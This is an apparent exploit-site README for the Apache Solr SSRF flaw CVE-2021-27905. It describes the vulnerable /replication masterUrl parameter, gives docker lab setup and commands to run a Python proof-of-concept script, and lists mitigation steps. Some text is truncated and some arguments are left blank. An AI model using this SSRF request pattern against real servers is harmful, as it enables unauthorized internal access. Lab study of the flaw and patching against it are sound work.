Exploit for Server-Side Request Forgery in Apache Solr CVE-2021-27905

## https://sploitus.com/exploit?id=6EC5E0A0-A185-564E-9DB7-11768AC67DEB
# CVE-2021-27905

| **Sr No** | **Title**                                     |
| --------- | --------------------------------------------- |
| 1         | [Overview](#Overview)                         |
| 2         | [Root Cause](#Root%20Cause)                   |
| 3         | [Proof Of Concept](#Proof%20Of%20Concept)     |
| 4         | [Mitigation (8.8.2+)](#Mitigation%20(8.8.2+)) |
| 5         | [Reference](#Reference)                       |

## Overview

This is a Server Side Request Forgery vulnerability affecting **Apache Solr** (/replication?command=fetchindex&masterUrl=http://
```

**Solr**'s `ReplicationHandler` would:
1. Accept the request.
2. Use the provided `masterUrl` to download index data.
3. Internally make an HTTP call to that address.

## Proof Of Concept

**LAB SETUP**
- A lab can be setup locally using docker:

```shell
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
```

- Cleanup

```shell
$ docker compose down
```

**EXPLOITATION**
- Setup a virtual environment:

```shell
# for windows
$ python -m venv 
$ .\\Scripts\activate
# for linux
$ python3 -m venv 
$ source .//scripts/activate
```

- Install requirements:

```shell
$ pip install -r requirements.txt
```

- Run `cve-2021-27905.py`

```shell
$ python3 cve-2021-27905.py --target  --payload 
```

![SSRF PoC](attachments/poc.gif)

## Mitigation (8.8.2+)

Solr `ReplicationHandler` was patched to:
- Validate that `masterUrl`/`leaderUrl` points only to approved hosts.
- Restrict acceptable URL schemes (`http`, `https` only ).
- Harden remote streaming features.
- Recommend admins to secure `/replication` with auth or remove it entirely if unused.

### Reference

- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

---